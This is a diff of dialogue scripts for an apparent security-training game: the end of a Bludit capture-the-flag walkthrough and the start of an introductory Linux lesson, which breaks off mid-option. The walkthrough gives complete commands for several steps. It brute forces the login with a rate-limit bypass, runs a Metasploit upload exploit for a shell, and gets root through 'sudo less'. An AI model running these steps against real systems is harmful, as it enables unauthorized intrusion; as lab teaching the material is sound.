+ + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== phase_3_bruteforce === +CTF Challenge Coordinator: Phase 3 is optional - brute forcing the Bludit password if you only have the username. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: Bludit has protections against brute forcing: CSRF tokens and IP-based rate limiting. + +CTF Challenge Coordinator: OWASP ZAP can bypass these protections with the right configuration. + ++ [How does CSRF protection work?] + CTF Challenge Coordinator: CSRF (Cross-Site Request Forgery) tokens are randomly generated by the server. + + CTF Challenge Coordinator: The server sends a token in each response, and the client must include it in the next request. + + CTF Challenge Coordinator: This prevents simple replay attacks because each request needs the current token. + + CTF Challenge Coordinator: OWASP ZAP can extract tokens from responses and insert them into requests automatically. + + ~ instructor_rapport += 5 + ++ [How does rate limiting protection work?] + CTF Challenge Coordinator: After a certain number of failed login attempts from the same IP, Bludit blocks that IP temporarily. + + CTF Challenge Coordinator: You'll see messages like "Too many incorrect attempts. Try again in 30 minutes." + + CTF Challenge Coordinator: However, we can bypass this using the X-Forwarded-For HTTP header. + + CTF Challenge Coordinator: By randomizing the X-Forwarded-For IP, we make each attempt appear to come from a different client. + + ~ instructor_rapport += 5 + ++ [Walk me through the ZAP brute force process] + CTF Challenge Coordinator: This is complex, so pay attention: + + CTF Challenge Coordinator: 1. Launch OWASP ZAP and configure it as a proxy + + CTF Challenge Coordinator: 2. Install the random_x_forwarded_for_ip.js script from the ZAP community scripts + + CTF Challenge Coordinator: 3. Browse to the Bludit login page through ZAP + + CTF Challenge Coordinator: 4. 
Attempt a login to capture the HTTP request in ZAP's history + + CTF Challenge Coordinator: 5. Right-click the POST request and select "Fuzz..." + + CTF Challenge Coordinator: 6. Select the password field and add a payload with common passwords + + CTF Challenge Coordinator: 7. Add the X-Forwarded-For script as a message processor + + CTF Challenge Coordinator: 8. Launch the fuzzer and look for different HTTP response codes + + CTF Challenge Coordinator: Successful logins typically return 301 or 302 (redirect) instead of 200 (error message). + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== phase_4_post_exploit === +CTF Challenge Coordinator: Phase 4 is post-exploitation - exploring the compromised system and hunting for flags. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: You should have a Meterpreter shell from the exploitation phase. + +CTF Challenge Coordinator: Now it's time to explore the system, understand your access level, and find flags. + ++ [What Meterpreter commands should I use?] + CTF Challenge Coordinator: Essential Meterpreter commands for exploration: + + CTF Challenge Coordinator: getuid - Shows your current username + + CTF Challenge Coordinator: sysinfo - System information (OS, architecture, etc.) + + CTF Challenge Coordinator: pwd - Print working directory + + CTF Challenge Coordinator: ls - List files in current directory + + CTF Challenge Coordinator: cat filename - Read file contents + + CTF Challenge Coordinator: cd /path - Change directory + + CTF Challenge Coordinator: shell - Drop to OS shell (Ctrl-C to return to Meterpreter) + + ~ instructor_rapport += 5 + ++ [Where should I look for flags?] 
+ CTF Challenge Coordinator: Flags are hidden in various locations: + + CTF Challenge Coordinator: Check your current directory - there might be a flag right where you land + + CTF Challenge Coordinator: Look in user home directories: /home/username/ + + CTF Challenge Coordinator: Different users might have different flags + + CTF Challenge Coordinator: Eventually, you'll need to check /root/ but that requires privilege escalation + + CTF Challenge Coordinator: Some flags might be in encrypted files - note encryption hints for later + + ~ instructor_rapport += 5 + ++ [How do I switch users?] + CTF Challenge Coordinator: To switch users, you need to drop to an OS shell first: + + CTF Challenge Coordinator: From Meterpreter, run: shell + + CTF Challenge Coordinator: Now you have a Linux shell. Use: su username + + CTF Challenge Coordinator: However, you'll need the user's password to switch + + CTF Challenge Coordinator: If you discovered the Bludit admin user's password earlier, you can switch to that user + + CTF Challenge Coordinator: Return to Meterpreter with Ctrl-C when done + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== phase_5_privesc === +CTF Challenge Coordinator: Phase 5 is privilege escalation - gaining root access to fully control the system. + +~ instructor_rapport += 5 + +CTF Challenge Coordinator: Your initial shell is likely running as the www-data user (the web server user) with limited privileges. + +CTF Challenge Coordinator: To access all system files and read flags in /root/, you need to escalate to root. + ++ [How do I check my privileges?] 
+ CTF Challenge Coordinator: From a shell, check your privileges: + + CTF Challenge Coordinator: whoami - Shows your username + + CTF Challenge Coordinator: id - Shows UID, GID, and groups + + CTF Challenge Coordinator: sudo -l - Lists commands you can run with sudo + + CTF Challenge Coordinator: Note: You might need a proper TTY terminal first: python3 -c 'import pty; pty.spawn("/bin/bash")' + + CTF Challenge Coordinator: This spawns a proper terminal that sudo will accept. + + ~ instructor_rapport += 5 + ++ [What's the sudo privilege escalation method?] + CTF Challenge Coordinator: When you run sudo -l, you'll see what commands you can run as root. + + CTF Challenge Coordinator: If you can run /usr/bin/less with sudo, that's your ticket to root! + + CTF Challenge Coordinator: The 'less' command is a pager for viewing files, but it can also execute shell commands. + + CTF Challenge Coordinator: When viewing a file with less, press ! followed by a command to execute it. + + CTF Challenge Coordinator: Since less is running with sudo privileges, any command you run will execute as root! + + ~ instructor_rapport += 5 + ++ [Walk me through getting root access] + CTF Challenge Coordinator: Here's the complete privilege escalation process: + + CTF Challenge Coordinator: 1. Drop to shell from Meterpreter: shell + + CTF Challenge Coordinator: 2. Spawn a proper terminal: python3 -c 'import pty; pty.spawn("/bin/bash")' + + CTF Challenge Coordinator: 3. Check sudo permissions: sudo -l + + CTF Challenge Coordinator: 4. You should see you can run less on a specific file + + CTF Challenge Coordinator: 5. Run that command with sudo: sudo /usr/bin/less /path/to/file + + CTF Challenge Coordinator: 6. When the file is displayed, type: !id + + CTF Challenge Coordinator: 7. You should see uid=0 (root!) in the output + + CTF Challenge Coordinator: 8. Now type: !/bin/bash + + CTF Challenge Coordinator: 9. You now have a root shell! 
Verify with: whoami + + CTF Challenge Coordinator: Now you can access /root/ and find the final flags! + + ~ instructor_rapport += 5 + +- -> guided_mode_hub + +=== complete_walkthrough === +CTF Challenge Coordinator: Here's the complete solution walkthrough from start to finish: + +~ instructor_rapport += 10 +~ ctf_mastery += 20 + +CTF Challenge Coordinator: **Phase 1 - Reconnaissance:** + +CTF Challenge Coordinator: nmap -sV -p- TARGET_IP + +CTF Challenge Coordinator: dirb http://TARGET_IP + +CTF Challenge Coordinator: nikto -h http://TARGET_IP + +CTF Challenge Coordinator: Browse discovered files, find admin login at /admin/, discover Bludit CMS, find leaked credentials + +CTF Challenge Coordinator: **Phase 2 - Exploitation:** + +CTF Challenge Coordinator: msfconsole + +CTF Challenge Coordinator: search bludit + +CTF Challenge Coordinator: use exploit/linux/http/bludit_upload_images_exec + +CTF Challenge Coordinator: set RHOSTS TARGET_IP + +CTF Challenge Coordinator: set BLUDITUSER admin (or discovered username) + +CTF Challenge Coordinator: set BLUDITPASS discovered_password + +CTF Challenge Coordinator: exploit + +CTF Challenge Coordinator: **Phase 3 - Post-Exploitation:** + +CTF Challenge Coordinator: getuid, sysinfo, ls, cat flag.txt (in current directory) + +CTF Challenge Coordinator: shell + +CTF Challenge Coordinator: su bludit_admin (with discovered password) + +CTF Challenge Coordinator: cat ~/flag.txt (in that user's home) + +CTF Challenge Coordinator: **Phase 4 - Privilege Escalation:** + +CTF Challenge Coordinator: python3 -c 'import pty; pty.spawn("/bin/bash")' + +CTF Challenge Coordinator: sudo -l (discover you can run less on a specific file) + +CTF Challenge Coordinator: sudo /usr/bin/less /path/to/file + +CTF Challenge Coordinator: !id (verify root) + +CTF Challenge Coordinator: !/bin/bash (spawn root shell) + +CTF Challenge Coordinator: cd /root && ls (find final flags) + +CTF Challenge Coordinator: That's the complete solution! 
Try to replicate it yourself now that you understand the approach. + +-> guided_mode_hub + +-> END diff --git a/story_design/ink/game_scenarios/intro_linux.ink b/story_design/ink/game_scenarios/intro_linux.ink new file mode 100644 index 0000000..be48723 --- /dev/null +++ b/story_design/ink/game_scenarios/intro_linux.ink 
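Review bot: `ctf_mode_hub` has a loose end: its first option, `+ [What tools should I start with?]`, ends at `~ instructor_rapport += 5` with no divert, and the knot has no gather after the option list, so choosing it runs the flow out instead of returning to the hub; add `-> ctf_mode_hub` after that option (or a closing `- -> ctf_mode_hub` gather, as the phase knots do). Two smaller inconsistencies in the same file: the option labelled `[I'm done - show me the solution walkthrough]` diverts to `guided_mode_hub` rather than `complete_walkthrough`, and because it never sets `challenge_mode = "guided"` the conditional gather in `web_tools_intro` still routes the player back to `ctf_mode_hub`; and `complete_walkthrough` numbers post-exploitation and privilege escalation as Phases 3 and 4 while `guided_mode_hub` lists them as Parts 4 and 5 (Part 3 being the optional ZAP brute force). Also, exploitation step 7 reads `set BLUDITPASS` with no value, unlike the `set BLUDITPASS discovered_password` line in the walkthrough; the step should say the password comes from recon or from Phase 3.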
@@ -0,0 +1,942 @@ +// =========================================== +// LINUX FUNDAMENTALS AND SECURITY LAB +// Introduction to Linux and Security +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: introducing_attacks/1_intro_linux.md +// =========================================== + +// Progress tracking +VAR linux_basics_discussed = false +VAR command_line_skills_discussed = false +VAR vi_editor_discussed = false +VAR piping_discussed = false +VAR redirection_discussed = false +VAR networking_discussed = false +VAR ssh_discussed = false +VAR hydra_discussed = false +VAR kali_intro_discussed = false + +// Detailed topic tracking +VAR pwd_ls_discussed = false +VAR file_manipulation_discussed = false +VAR man_pages_discussed = false +VAR piping_examples_discussed = false +VAR redirection_examples_discussed = false +VAR ifconfig_discussed = false +VAR ssh_basics_discussed = false +VAR ssh_x_forwarding_discussed = false +VAR bruteforce_basics_discussed = false + +// Challenge completion +VAR completed_vi_challenge = false +VAR completed_piping_challenge = false +VAR completed_ssh_challenge = false +VAR completed_hydra_challenge = false + +// Instructor relationship +VAR instructor_rapport = 0 +VAR deep_dives_completed = 0 + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT - LINUX INSTRUCTOR +// =========================================== + +=== start === +~ instructor_rapport = 0 + +Tech Instructor: Welcome to Linux Fundamentals and Security, Agent {player_name}. I'm your technical instructor for this session. + +Tech Instructor: This lab covers essential Linux command-line skills, remote administration via SSH, and basic penetration testing techniques. All crucial skills for field operations. + +Tech Instructor: Think of this as building your foundational toolkit. 
Every SAFETYNET agent needs to be comfortable in Linux environments—most of our targets run Linux servers, and Kali Linux is our primary offensive platform. + +-> linux_training_hub + +// =========================================== +// MAIN TRAINING HUB +// =========================================== + +=== linux_training_hub === + +Tech Instructor: What would you like to cover? + ++ {not linux_basics_discussed} [Learn about Linux basics and why it matters] + -> linux_basics_intro ++ {not command_line_skills_discussed} [Essential command-line skills] + -> command_line_skills ++ {not vi_editor_discussed} [Learn the vi editor] + -> vi_editor_intro ++ {not piping_discussed} [Piping between programs] + -> piping_intro ++ {not redirection_discussed} [Redirecting input and output] + -> redirection_intro ++ {not networking_discussed} [Basic Linux networking] + -> networking_basics ++ {not kali_intro_discussed} [Introduction to Kali Linux] + -> kali_intro ++ {not ssh_discussed} [Remote shell access with SSH] + -> ssh_intro ++ {not hydra_discussed} [Attacking SSH with Hydra] + -> hydra_intro ++ {linux_basics_discussed and command_line_skills_discussed} [Show me the essential commands reference] + -> commands_reference ++ {ssh_discussed or hydra_discussed} [Tips for the hands-on challenges] + -> challenge_tips ++ [I'm ready to start the practical exercises] + -> ready_for_practice ++ [That's all I need for now] + -> end_session + +// =========================================== +// LINUX BASICS +// =========================================== + +=== linux_basics_intro === +~ linux_basics_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Excellent starting point. Let me explain why Linux matters for security work. + +Tech Instructor: Linux is the backbone of modern internet infrastructure. Google, Facebook, Amazon—they all run Linux servers at massive scale. 
When you're conducting penetration tests or investigating security incidents, you'll encounter Linux systems constantly. + +Tech Instructor: More importantly for us, the best security tools are Linux-native. Kali Linux contains hundreds of specialized tools for penetration testing, forensics, and security analysis. Mastering Linux means mastering your toolkit. + +Tech Instructor: Linux comes in many "distributions"—different flavors packaged for different purposes. Ubuntu for ease of use, Debian for stability, Kali for security testing. They all share the same core commands and concepts, so learning one helps you understand them all. + +* [Why not just use Windows?] + ~ deep_dives_completed += 1 + You: Why can't we just use Windows for security work? + -> windows_comparison +* [What makes Kali special?] + ~ deep_dives_completed += 1 + You: What specifically makes Kali Linux the industry standard? + -> kali_explanation +* [Got it, let's move on] + You: Understood. Linux is essential for security work. + -> linux_training_hub + +=== windows_comparison === +~ instructor_rapport += 8 + +Tech Instructor: Fair question. Windows absolutely has its place—many enterprise environments are Windows-heavy, and you'll need those skills too. + +Tech Instructor: But for offensive security work, Linux has three major advantages: + +Tech Instructor: **First**, the tools. Most cutting-edge security research happens in the open-source community, and those tools are Linux-first. Sure, some get ported to Windows eventually, but you'll always be behind the curve. + +Tech Instructor: **Second**, the control. Linux gives you deep system access and transparency. You can see exactly what's happening, modify anything, and automate everything. That level of control is crucial when you're trying to exploit systems or analyze malware. + +Tech Instructor: **Third**, the culture. The security community lives in Linux. 
Understanding Linux means understanding how other security professionals work, communicate, and share knowledge. + +~ instructor_rapport += 5 +-> linux_training_hub + +=== kali_explanation === +~ instructor_rapport += 8 + +Tech Instructor: Kali is essentially a curated arsenal of security tools, all pre-configured and ready to use. + +Tech Instructor: Offensive Security—the company behind Kali—maintains hundreds of tools across every category: information gathering, vulnerability analysis, wireless attacks, exploitation, post-exploitation, forensics, you name it. + +Tech Instructor: What makes Kali special isn't just the tools, though. It's the integration. Everything works together. The tools are kept up-to-date. Documentation is solid. And it's become the lingua franca of penetration testing—when security professionals share techniques, they assume you're using Kali. + +Tech Instructor: Think of it like this: you *could* build your own toolkit from scratch, hunting down each tool individually and figuring out dependencies. Or you could use Kali and get straight to the actual security work. + +~ instructor_rapport += 5 +-> linux_training_hub + +// =========================================== +// COMMAND-LINE SKILLS +// =========================================== + +=== command_line_skills === +~ command_line_skills_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Right, let's build your command-line fundamentals. These are skills you'll use every single day in the field. + +Tech Instructor: The command line might seem archaic compared to graphical interfaces, but it's exponentially more powerful. You can automate tasks, chain commands together, work on remote systems, and handle massive datasets—all from a simple text interface. + +Tech Instructor: I'll cover the essential commands: navigating the filesystem, manipulating files and directories, viewing content, and getting help when you're stuck. 
+ +* [Show me the navigation commands] + ~ pwd_ls_discussed = true + You: How do I navigate the filesystem? + -> navigation_commands +* [How do I work with files?] + ~ file_manipulation_discussed = true + You: What about creating and editing files? + -> file_manipulation +* [How do I get help when stuck?] + ~ man_pages_discussed = true + You: What if I don't know what a command does? + -> man_pages +* [I want to see the full command reference] + You: Can I see a complete list of essential commands? + -> commands_reference + +=== navigation_commands === +~ instructor_rapport += 3 + +Tech Instructor: Navigation is your foundation. Here are the essentials: + +Tech Instructor: **pwd** - "print working directory". Shows exactly where you are in the filesystem. Lost? Run pwd. + +Tech Instructor: **ls** - lists files in your current directory. Add "-la" for detailed information including hidden files and permissions. You'll use "ls -la" constantly. + +Tech Instructor: **cd** - "change directory". Moves you around the filesystem. "cd .." goes up one level, "cd" alone takes you home. + +Tech Instructor: Pro tip: pressing Tab autocompletes filenames and commands. Type a few letters, hit Tab, save yourself endless typing. And use the up arrow to cycle through previous commands. + +* [Tell me more about ls flags] + You: What other useful flags does ls have? + Tech Instructor: Great question. "ls -lt" sorts by modification time, newest first. "ls -lh" shows human-readable file sizes. "ls -lR" recursively lists subdirectories. You can combine them: "ls -lhta" shows all files, human-readable sizes, sorted by time. + ~ instructor_rapport += 5 + -> command_line_followup +* [What about hidden files?] + You: What are hidden files? + Tech Instructor: In Linux, files starting with "." are hidden—they don't show up in normal ls output. Configuration files are typically hidden. Use "ls -a" to see them. You'll frequently need to examine hidden config files during security assessments. 
+ ~ instructor_rapport += 5 + -> command_line_followup +* [Got it] + -> command_line_followup + +=== command_line_followup === ++ [Show me file manipulation commands] + -> file_manipulation ++ [How do I get help when stuck?] + -> man_pages ++ [Back to the main menu] + -> linux_training_hub + +=== file_manipulation === +~ instructor_rapport += 3 + +Tech Instructor: Creating, copying, moving, and viewing files. Bread and butter stuff. + +Tech Instructor: **mkdir** - creates directories. "mkdir mydir" creates a new folder. + +Tech Instructor: **cp** - copies files. "cp source destination" copies a file. Add "-r" for recursive directory copying. + +Tech Instructor: **mv** - moves or renames files. "mv oldname newname" renames. "mv file /path/to/destination/" moves it. + +Tech Instructor: **cat** - dumps file contents to the screen. "cat filename" shows the whole file. + +Tech Instructor: **echo** - prints text. "echo 'hello world'" displays text. Useful for testing and scripting. + +* [Tell me more about viewing files] + You: Cat seems limited for large files... + Tech Instructor: Exactly right. For large files, use **less**. "less filename" lets you scroll through, search with "/", quit with "q". Much more practical than cat for big files. + ~ instructor_rapport += 8 + -> command_line_followup +* [What about creating files?] + You: How do I create a new empty file? + Tech Instructor: Several ways. "touch filename" creates an empty file. Or redirect output: "echo 'content' > filename" creates a file with content. We'll cover redirection shortly. + ~ instructor_rapport += 5 + -> command_line_followup +* [Understood] + -> command_line_followup + +=== man_pages === +~ man_pages_discussed = true +~ instructor_rapport += 8 + +Tech Instructor: This is possibly the most important skill: learning to teach yourself. + +Tech Instructor: **man** - the manual pages. "man command" shows comprehensive documentation for any command. 
Navigation: space to page down, "b" to page up, "/" to search, "q" to quit. + +Tech Instructor: Example: "man ls" shows every flag and option for ls. The man pages are detailed, sometimes overwhelming, but they're authoritative. + +Tech Instructor: Alternative: **info** command provides similar documentation, sometimes more detailed. + +Tech Instructor: Pro tip: if you're really stuck, try "command --help" for a quick summary. Many tools also have online documentation, but man pages are always available, even when you're offline on a compromised system with no internet. + +* [How do I search man pages?] + You: Can I search across all man pages for a topic? + Tech Instructor: Yes. "man -k keyword" searches all man page descriptions. "apropos keyword" does the same thing. Useful when you know what you want to do but not which command does it. + ~ instructor_rapport += 10 + -> command_line_followup +* [What if man pages are too dense?] + You: Man pages can be pretty technical... + Tech Instructor: True. For beginner-friendly explanations, try "tldr command"—it shows simplified examples. Or search online for "command examples". But learning to parse man pages is a skill worth developing. They're accurate, complete, and always available. + ~ instructor_rapport += 8 + -> command_line_followup +* [Makes sense] + -> command_line_followup + +// =========================================== +// VI EDITOR +// =========================================== + +=== vi_editor_intro === +~ vi_editor_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Ah, vi. The editor that's been causing both frustration and devotion since 1976. + +Tech Instructor: Here's why you need to know vi: it's on *every* Unix and Linux system. When you SSH into a compromised server with minimal tools, vi will be there. Other editors might not be. + +Tech Instructor: Vi is modal. Two main modes: **normal mode** for commands, **insert mode** for typing text. 
+ +Tech Instructor: The essentials: +- "vi filename" opens or creates a file +- Press "i" to enter insert mode (now you can type) +- Press Esc to return to normal mode +- In normal mode: ":wq" writes and quits, ":q!" quits without saving + +Tech Instructor: That's literally everything you need to survive vi. + +* [Tell me more about normal mode commands] + ~ deep_dives_completed += 1 + You: What else can I do in normal mode? + -> vi_advanced_commands +* [Why not use nano or another editor?] + You: Why not just use nano? It seems simpler. + Tech Instructor: Nano is fine for quick edits. But vi is universal and powerful. On hardened systems or embedded devices, vi might be your only option. Plus, once you learn it, vi is dramatically faster. Your call, but I recommend at least learning vi basics. + ~ instructor_rapport += 5 + -> vi_editor_followup +* [I'll learn the basics] + ~ completed_vi_challenge = true + You: Got it. I'll practice the essential commands. + -> vi_editor_followup + +=== vi_advanced_commands === +~ instructor_rapport += 8 + +Tech Instructor: Want to unlock vi's power? Here are some favorites: + +Tech Instructor: **Navigation in normal mode:** +- "h" "j" "k" "l" move cursor left, down, up, right +- "w" jumps forward by word, "b" jumps back +- "gg" jumps to start of file, "G" jumps to end + +Tech Instructor: **Editing in normal mode:** +- "dd" deletes current line +- "30dd" deletes 30 lines +- "yy" copies (yanks) current line +- "p" pastes +- "u" undo +- "/" searches, "n" finds next match + +Tech Instructor: You can combine commands: "d10j" deletes 10 lines down. "c3w" changes next 3 words. + +Tech Instructor: Ten minutes with a vi tutorial will make you look like a wizard. It's worth it. 
+ +~ instructor_rapport += 10 +-> vi_editor_followup + +=== vi_editor_followup === ++ [Back to main menu] + -> linux_training_hub + +// =========================================== +// PIPING +// =========================================== + +=== piping_intro === +~ piping_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Piping is where Linux becomes genuinely powerful. You can chain simple commands together to accomplish complex tasks. + +Tech Instructor: The pipe operator "|" sends the output of one command to the input of another. + +Tech Instructor: Example: "cat /etc/passwd | grep /home/" + +Tech Instructor: This reads the passwd file and filters it to only lines containing "/home/". Two simple commands, combined to do something useful. + +Tech Instructor: You can chain multiple pipes: "cat /etc/passwd | grep /home/ | sort -r" - now it's filtered *and* sorted in reverse. + +* [Show me more examples] + ~ piping_examples_discussed = true + You: What are some practical piping examples? + -> piping_examples +* [What commands work well with pipes?] + You: Which commands are commonly piped together? + -> piping_common_commands +* [I've got the concept] + ~ completed_piping_challenge = true + -> linux_training_hub + +=== piping_examples === +~ instructor_rapport += 8 + +Tech Instructor: Here are real-world examples you'll use constantly: + +Tech Instructor: **Finding running processes:** +"ps aux | grep ssh" - lists all processes, filters for SSH-related ones. + +Tech Instructor: **Analyzing logs:** +"cat logfile | grep ERROR | sort | uniq -c | sort -nr" - finds errors, sorts them, counts unique occurrences, sorts by frequency. One line, powerful analysis. + +Tech Instructor: **Network analysis:** +"netstat -an | grep ESTABLISHED" - shows active network connections. + +Tech Instructor: **Counting things:** +"ls | wc -l" - counts files in current directory. + +Tech Instructor: The Unix philosophy: small tools that do one thing well, combined creatively. 
Piping is how you combine them. + +~ completed_piping_challenge = true +~ instructor_rapport += 5 +-> linux_training_hub + +=== piping_common_commands === +~ instructor_rapport += 8 + +Tech Instructor: Commands that work brilliantly in pipes: + +Tech Instructor: **grep** - filters lines matching a pattern. Your most-used pipe command. + +Tech Instructor: **sort** - sorts lines alphabetically. "-n" for numeric sort, "-r" for reverse. + +Tech Instructor: **uniq** - removes duplicate adjacent lines. Usually used after sort. "-c" counts occurrences. + +Tech Instructor: **head** and **tail** - show first or last N lines. "head -20" shows first 20 lines. + +Tech Instructor: **wc** - word count. "-l" counts lines, "-w" counts words, "-c" counts characters. + +Tech Instructor: **cut** - extracts columns from text. "cut -d: -f1" splits on colons, takes first field. + +Tech Instructor: **awk** and **sed** - powerful text processing. More advanced, but incredibly useful. + +Tech Instructor: Learn these, and you can process massive datasets from the command line. + +~ completed_piping_challenge = true +~ instructor_rapport += 5 +-> linux_training_hub + +// =========================================== +// REDIRECTION +// =========================================== + +=== redirection_intro === +~ redirection_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Redirection lets you send command output to files or read input from files. + +Tech Instructor: Three key operators: + +Tech Instructor: **>** - redirects output to a file, overwriting it. "ls > filelist.txt" saves directory listing to a file. + +Tech Instructor: **>>** - redirects output to a file, appending. "echo 'new line' >> file.txt" adds to the end. + +Tech Instructor: **<** - reads input from a file. "wc -l < file.txt" counts lines in the file. + +Tech Instructor: Practical example: "ps aux > processes.txt" saves a snapshot of running processes for analysis. 
+ +* [Show me more redirection examples] + ~ redirection_examples_discussed = true + You: What are some practical redirection scenarios? + -> redirection_examples +* [What about error messages?] + You: Can I redirect error messages too? + -> stderr_redirection +* [Understood] + -> linux_training_hub + +=== redirection_examples === +~ instructor_rapport += 8 + +Tech Instructor: Practical redirection scenarios: + +Tech Instructor: **Saving command output for later:** +"ifconfig > network_config.txt" - captures network configuration. + +Tech Instructor: **Building logs:** +"echo '$(date): Scan completed' >> scan_log.txt" - appends timestamped entries. + +Tech Instructor: **Combining with pipes:** +"cat /etc/passwd | grep /home/ > users.txt" - filters and saves results. + +Tech Instructor: **Quick file creation:** +"echo 'test content' > test.txt" - creates a file with content in one command. + +Tech Instructor: During security assessments, you'll constantly redirect command output to files for documentation and later analysis. + +~ instructor_rapport += 5 +-> linux_training_hub + +=== stderr_redirection === +~ instructor_rapport += 10 + +Tech Instructor: Good catch. There are actually two output streams: stdout (standard output) and stderr (standard error). + +Tech Instructor: By default, ">" only redirects stdout. Error messages still appear on screen. + +Tech Instructor: To redirect stderr: "command 2> errors.txt" + +Tech Instructor: To redirect both: "command > output.txt 2>&1" - sends stderr to stdout, which goes to the file. + +Tech Instructor: Or in modern Bash: "command &> output.txt" does the same thing more simply. + +Tech Instructor: To discard output entirely: "command > /dev/null 2>&1" - sends everything to the void. + +Tech Instructor: This is advanced stuff, but incredibly useful when scripting or when you want clean output. 
+ +~ instructor_rapport += 10 +-> linux_training_hub + +// =========================================== +// NETWORKING BASICS +// =========================================== + +=== networking_basics === +~ networking_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Linux networking commands. Essential for understanding network configurations and troubleshooting connectivity. + +Tech Instructor: **ifconfig** - the classic command to view network interfaces and IP addresses. Shows all your network adapters. + +Tech Instructor: **ip** - the modern replacement. "ip a s" (ip address show) does the same thing. You'll see both used in the field. + +Tech Instructor: **hostname -I** - quick way to display just your IP address. + +Tech Instructor: In our environment, your IP typically starts with "172.22" or "10" - those are private network ranges. + +* [Tell me more about network interfaces] + ~ ifconfig_discussed = true + You: What are network interfaces exactly? + -> network_interfaces +* [How do I troubleshoot network issues?] + You: What if my network isn't working? + -> network_troubleshooting +* [What about finding other machines?] + You: How do I discover other systems on the network? + Tech Instructor: Good question, but that's scanning territory. We'll cover tools like nmap in the scanning module. For now, focus on understanding your own network configuration. + ~ instructor_rapport += 5 + -> linux_training_hub +* [Got it] + -> linux_training_hub + +=== network_interfaces === +~ instructor_rapport += 8 + +Tech Instructor: Network interfaces are how your computer connects to networks. Think of them as connection points. + +Tech Instructor: **eth0, eth1** - Ethernet interfaces. Physical network ports. + +Tech Instructor: **wlan0** - Wireless interface. WiFi adapter. + +Tech Instructor: **lo** - Loopback interface, always 127.0.0.1. Your computer talking to itself. Useful for testing. 
+ +Tech Instructor: **Virtual interfaces** - VPNs and containers create virtual interfaces like tun0, tap0, docker0. + +Tech Instructor: When you run ifconfig, you see all interfaces, their IP addresses, MAC addresses, and traffic statistics. Essential information for network security assessments. + +~ instructor_rapport += 5 +-> linux_training_hub + +=== network_troubleshooting === +~ instructor_rapport += 8 + +Tech Instructor: Basic network troubleshooting steps: + +Tech Instructor: **Step 1:** Check interface status with "ifconfig" or "ip a s". Is the interface up? Does it have an IP? + +Tech Instructor: **Step 2:** If no IP, try "dhclient eth0" to request one from DHCP server. + +Tech Instructor: **Step 3:** Test local connectivity: "ping 127.0.0.1" tests your network stack. + +Tech Instructor: **Step 4:** Test gateway: "ping your_gateway_ip" tests local network. + +Tech Instructor: **Step 5:** Test DNS: "ping google.com" tests name resolution and external connectivity. + +Tech Instructor: In our lab environment, if you're having issues, usually dhclient fixes it. In the field, troubleshooting can be much more complex. + +~ instructor_rapport += 5 +-> linux_training_hub + +// =========================================== +// KALI LINUX +// =========================================== + +=== kali_intro === +~ kali_intro_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: Kali Linux. Your primary offensive security platform. + +Tech Instructor: Released by Offensive Security in 2013 as the successor to BackTrack Linux. It's specifically designed for penetration testing, security auditing, and digital forensics. + +Tech Instructor: Kali includes hundreds of pre-installed tools organized by category: information gathering, vulnerability analysis, wireless attacks, web applications, exploitation tools, password attacks, forensics, and more. + +Tech Instructor: Default credentials: username "kali", password "kali". 
Never use Kali as your primary OS—it's designed for security testing, not everyday computing. + +* [Show me what tools are available] + You: What kinds of tools are we talking about? + -> kali_tools_overview +* [How is Kali organized?] + You: How do I find the right tool for a task? + -> kali_organization +* [Sounds powerful] + -> linux_training_hub + +=== kali_tools_overview === +~ instructor_rapport += 8 + +Tech Instructor: Let me give you a taste of what's available: + +Tech Instructor: **Information Gathering:** nmap, dnsenum, whois, recon-ng. Tools for mapping networks and gathering intelligence. + +Tech Instructor: **Vulnerability Analysis:** Nessus, OpenVAS, nikto. Automated scanners that identify security weaknesses. + +Tech Instructor: **Exploitation:** Metasploit Framework, BeEF, sqlmap. Tools for actively exploiting vulnerabilities. + +Tech Instructor: **Password Attacks:** Hydra, John the Ripper, hashcat. Cracking and bruteforcing credentials. + +Tech Instructor: **Wireless Attacks:** Aircrack-ng, Reaver, Wifite. WiFi security testing. + +Tech Instructor: **Forensics:** Autopsy, Sleuth Kit, Volatility. Analyzing systems and recovering data. + +Tech Instructor: And those are just highlights. Run "ls /usr/bin" to see hundreds more. It's an arsenal. + +~ instructor_rapport += 5 +-> linux_training_hub + +=== kali_organization === +~ instructor_rapport += 8 + +Tech Instructor: Kali organizes tools by the penetration testing lifecycle: + +Tech Instructor: **Phase 1 - Information Gathering:** Passive and active reconnaissance. Learning about your target. + +Tech Instructor: **Phase 2 - Vulnerability Analysis:** Identifying weaknesses in systems and applications. + +Tech Instructor: **Phase 3 - Exploitation:** Actually compromising systems using identified vulnerabilities. + +Tech Instructor: **Phase 4 - Post-Exploitation:** What you do after gaining access. Maintaining access, pivoting, data exfiltration. 
+ +Tech Instructor: The Applications menu mirrors this structure. When you need a tool, think about which phase you're in, and browse that category. + +Tech Instructor: You'll also quickly learn the handful of tools you use constantly. Nmap, Metasploit, Burp Suite, Wireshark—these become second nature. + +~ instructor_rapport += 5 +-> linux_training_hub + +// =========================================== +// SSH - SECURE SHELL +// =========================================== + +=== ssh_intro === +~ ssh_discussed = true +~ instructor_rapport += 5 + +Tech Instructor: SSH - Secure Shell. Encrypted remote access to systems. One of your most critical tools. + +Tech Instructor: SSH lets you securely connect to remote Linux systems and execute commands as if you were sitting at that machine. All traffic is encrypted, protecting against eavesdropping. + +Tech Instructor: Basic usage: "ssh username@ip_address" + +Tech Instructor: The server typically listens on port 22. When you connect, you authenticate (usually with password or key), and then you have a remote shell. + +Tech Instructor: SSH replaced older, insecure protocols like Telnet and rlogin, which transmitted passwords in cleartext. Never use those—always use SSH. + +* [Tell me about SSH keys] + You: What about SSH key authentication? + -> ssh_keys +* [What's X11 forwarding?] + ~ ssh_x_forwarding_discussed = true + You: I saw something about -X flag for forwarding? + -> ssh_x_forwarding +* [How do I verify I'm connecting to the right server?] + You: 